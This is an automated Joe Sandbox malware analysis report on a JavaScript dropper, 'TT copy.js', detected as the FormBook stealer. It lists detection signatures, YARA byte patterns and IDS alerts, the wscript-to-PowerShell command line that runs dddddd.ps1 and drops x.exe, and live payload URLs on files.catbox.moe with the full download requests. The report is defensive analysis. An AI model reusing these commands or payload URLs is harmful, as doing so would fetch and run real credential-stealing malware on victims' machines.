Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TT copy.js

Overview

General Information

Sample name:TT copy.js
Analysis ID:1578023
MD5:24b70c6f9b34265023f8b4e9ceb4ae2e
SHA1:94e435325199616348f67aa17f0209b90d4d6b18
SHA256:6f1bdd6bc9a18a5ac6d7c28323e18f8aae4c5db0a5b54cc72df547518e7386c8
Tags:jsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6632 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 3448 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: DF1F48D5D5C174AA6AB5910BB41064FB)
        • x.exe (PID: 2596 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: DF1F48D5D5C174AA6AB5910BB41064FB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bc20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ec23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Process Memory Space: powershell.exe PID: 6896INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x16391d:$b1: ::WriteAllBytes(
      • 0x2a66bb:$b1: ::WriteAllBytes(
      • 0x163939:$b2: ::FromBase64String(
      • 0x2a66d7:$b2: ::FromBase64String(
      • 0x51644:$s1: -join
      • 0x5e8c5:$s1: -join
      • 0x61d87:$s1: -join
      • 0x62421:$s1: -join
      • 0x63f1d:$s1: -join
      • 0x6617f:$s1: -join
      • 0x669a6:$s1: -join
      • 0x67217:$s1: -join
      • 0x67952:$s1: -join
      • 0x67984:$s1: -join
      • 0x679cc:$s1: -join
      • 0x679eb:$s1: -join
      • 0x6823c:$s1: -join
      • 0x683b8:$s1: -join
      • 0x68430:$s1: -join
      • 0x684c3:$s1: -join
      • 0x68729:$s1: -join
      SourceRuleDescriptionAuthorStrings
      4.2.x.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        4.2.x.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ec23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        4.2.x.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.x.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2de23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6632, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", ProcessId: 6632, ProcessName: wscript.exe
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6632, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", ProcessId: 6632, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6632, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 6896, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-19T07:50:05.501534+010020188561A Network Trojan was detected108.181.20.35443192.168.2.449730TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-19T07:50:13.921848+010028033053Unknown Traffic192.168.2.449732108.181.20.35443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-19T07:50:05.500940+010028275781A Network Trojan was detected192.168.2.449730108.181.20.35443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Yara matchFile source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: Binary string: FREAKY.pdb source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: VCJSKS.pdb source: x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr
          Source: Binary string: FREAKY.pdb(~>~ 0~_CorDllMainmscoree.dll source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: x.exe, x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Source: TT copy.jsArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true']Go to definition
          Source: TT copy.jsArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"']Go to definition
          Source: TT copy.jsArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 01450B8Bh3_2_01450848
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 01450B8Bh3_2_01450838
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 01450B8Bh3_2_014507D0

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49730 -> 108.181.20.35:443
          Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49730
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
          Source: global trafficHTTP traffic detected: GET /0hc11b.txt HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t7rwbh.txt HTTP/1.1Host: files.catbox.moe
          Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 108.181.20.35:443
          Source: global trafficHTTP traffic detected: GET /ugok5m.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /ugok5m.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /0hc11b.txt HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t7rwbh.txt HTTP/1.1Host: files.catbox.moe
          Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
          Source: powershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
          Source: wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
          Source: x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/0hc11b.txt
          Source: x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.drString found in binary or memory: https://files.catbox.moe/0hc11b.txt%Operation
          Source: x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.drString found in binary or memory: https://files.catbox.moe/t7rwbh.txt
          Source: wscript.exe, 00000000.00000002.1810209924.000001E28B7D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808548812.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1809879390.000001E28B740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808125947.000001E28D5C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809052719.000001E28B73F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808184117.000001E28B7CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808155576.000001E28B97B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808090724.000001E28D5C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723248018.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723320024.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808695826.000001E28B765000.00000004.00000020.00020000.00000000.sdmp, TT copy.jsString found in binary or memory: https://files.catbox.moe/ugok5m.ps1
          Source: wscript.exe, 00000000.00000003.1808548812.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723248018.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723320024.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/ugok5m.ps1u
          Source: wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
          Source: powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comF
          Source: powershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
          Source: powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6896, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042BF13 NtClose,4_2_0042BF13
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C35C0 NtCreateMutant,LdrInitializeThunk,4_2_019C35C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2B60 NtClose,LdrInitializeThunk,4_2_019C2B60
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_019C2DF0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_019C2C70
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C3090 NtSetValueKey,4_2_019C3090
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C3010 NtOpenDirectoryObject,4_2_019C3010
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C4340 NtSetContextThread,4_2_019C4340
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C4650 NtSuspendThread,4_2_019C4650
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C39B0 NtGetContextThread,4_2_019C39B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2B80 NtQueryInformationFile,4_2_019C2B80
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2BA0 NtEnumerateValueKey,4_2_019C2BA0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2BF0 NtAllocateVirtualMemory,4_2_019C2BF0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2BE0 NtQueryValueKey,4_2_019C2BE0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2AB0 NtWaitForSingleObject,4_2_019C2AB0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2AD0 NtReadFile,4_2_019C2AD0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2AF0 NtWriteFile,4_2_019C2AF0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2DB0 NtEnumerateKey,4_2_019C2DB0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2DD0 NtDelayExecution,4_2_019C2DD0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C3D10 NtOpenProcessToken,4_2_019C3D10
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2D10 NtMapViewOfSection,4_2_019C2D10
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2D00 NtSetInformationFile,4_2_019C2D00
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2D30 NtUnmapViewOfSection,4_2_019C2D30
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C3D70 NtOpenThread,4_2_019C3D70
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2CA0 NtQueryInformationToken,4_2_019C2CA0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2CC0 NtQueryVirtualMemory,4_2_019C2CC0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2CF0 NtOpenProcess,4_2_019C2CF0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2C00 NtQueryInformationProcess,4_2_019C2C00
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2C60 NtCreateKey,4_2_019C2C60
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2F90 NtProtectVirtualMemory,4_2_019C2F90
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2FB0 NtResumeThread,4_2_019C2FB0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2FA0 NtQuerySection,4_2_019C2FA0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2FE0 NtCreateFile,4_2_019C2FE0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2F30 NtCreateSection,4_2_019C2F30
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2F60 NtCreateProcessEx,4_2_019C2F60
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2E80 NtReadVirtualMemory,4_2_019C2E80
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2EA0 NtAdjustPrivilegesToken,4_2_019C2EA0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2EE0 NtQueueApcThread,4_2_019C2EE0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C2E30 NtWriteVirtualMemory,4_2_019C2E30
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_014508483_2_01450848
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_014530283_2_01453028
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0145422E3_2_0145422E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040F8F34_2_0040F8F3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004011D04_2_004011D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004161DE4_2_004161DE
